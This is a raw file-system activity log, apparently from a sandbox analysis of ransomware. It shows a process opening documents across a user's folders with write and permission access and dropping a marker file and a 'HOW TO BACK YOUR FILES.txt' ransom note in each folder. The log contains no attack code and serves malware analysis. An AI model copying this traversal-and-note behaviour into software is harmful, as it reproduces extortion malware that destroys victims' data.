Create C:\Users\FD1HVy\Links\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Favorites\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Favorites\Bing.url desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Favorites\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Favorites\Links\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Favorites\Links\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Downloads\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Downloads\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Documents\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\3 jiOxfC.xlsx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\cuZF8zNtkH1ph ibNaP.docx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\Database1.accdb desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\dhSD1u3DH.odt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\dZQ_mjHLDjsbVneC6cd.docx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\EAok5ewOXNobQh.ots desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\FJ6mUP3Il.pptx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\fsJ8kTuOCLSl-C_JQct.xlsx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\HWI6QLOj9su4aVLe9iXw.xlsx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\IrhwLsePMUurM.docx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\JHU0USB Z-UIYlMKL9Z.pptx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\kJNpSxm0FJ.docx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\NojVjWHIt.docx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\oLihILFnIluq9HK.xlsx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\qX7qJ7WfX.pptx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\sfR3PnODJm2Om4GAN.xlsx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\siSo J5a.csv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\zGVRPL4IiUF2BCKlPu.pptx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\_FMzdb HzQF-E.pptx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\_VM7P01h9hZnAJlar.odt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Documents\Outlook Files\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\Outlook Files\kkcie@kdj.kd.pst desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\Outlook Files\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Documents\My Shapes\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\My Shapes\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Documents\My Shapes\_private\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\My Shapes\_private\folder.ico desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\My Shapes\_private\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-0K PhNNHHadw-4-e.ppt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\CDDkVk.rtf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\jMF5ZBp2kKj.odt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\TKlqgRD9 Nr6 m.pps desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\bO1p3mfPqljshov1\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\bO1p3mfPqljshov1\NHEaUnME.rtf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\bO1p3mfPqljshov1\ulXMy6BOucJen4sW.ppt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\bO1p3mfPqljshov1\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\bO1p3mfPqljshov1\UQBqZ\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\bO1p3mfPqljshov1\UQBqZ\n-412MXR6-L.pdf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\bO1p3mfPqljshov1\UQBqZ\oCaEFK.pps desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\bO1p3mfPqljshov1\UQBqZ\xEqwtSKV7zLSf.pps desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\bO1p3mfPqljshov1\UQBqZ\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\B5abvTlhU7kaxv-9\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\B5abvTlhU7kaxv-9\0ilze62eyGGp8o2xbiCL.pps desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\B5abvTlhU7kaxv-9\7Zjtx91ByGcvrFKaZy.xls desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\B5abvTlhU7kaxv-9\Q9S3eEzzxB5rF.ots desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\B5abvTlhU7kaxv-9\SvK-1oG.docx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\B5abvTlhU7kaxv-9\tYLtI.doc desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\B5abvTlhU7kaxv-9\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\8IgFx4zl3bMpZVF MD\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\8IgFx4zl3bMpZVF MD\ArOyoOdOI6imJTOdUQz.docx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\8IgFx4zl3bMpZVF MD\FKzNXHAJ9H_X.rtf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\8IgFx4zl3bMpZVF MD\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\8IgFx4zl3bMpZVF MD\CV 4F8bU8BkzH0h\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\8IgFx4zl3bMpZVF MD\CV 4F8bU8BkzH0h\I3HSL.pptx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\8IgFx4zl3bMpZVF MD\CV 4F8bU8BkzH0h\x7LJ0ZYN8.odt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\8IgFx4zl3bMpZVF MD\CV 4F8bU8BkzH0h\yjNibne Et76JLFiG7Cj.rtf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\8IgFx4zl3bMpZVF MD\CV 4F8bU8BkzH0h\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\iAgvW_.odp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\JBjCvXV vQ.ppt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\RMDD_1hr.pdf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\VfPvOBGOXfF2YuC.pptx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\yBFSczQSgZ4zH_5p0CuH.ots desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\FZyK4S\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\FZyK4S\EBFJF68kMJmPOC6j8o0H.docx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\FZyK4S\rMkT8DHQ-.pdf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\FZyK4S\TUjgZaL_tfSm-QNcJ8.ods desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\FZyK4S\xAZVXzPkRJ6.pptx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\FZyK4S\zOFtTnfv6Q_MW3.rtf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\FZyK4S\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\8TIq-qdhatQQU4\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Documents\bfXUap4YidEivvL6\-plMuAf\8TIq-qdhatQQU4\9ehLACIDaiZ9PxP8jeTb.odp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
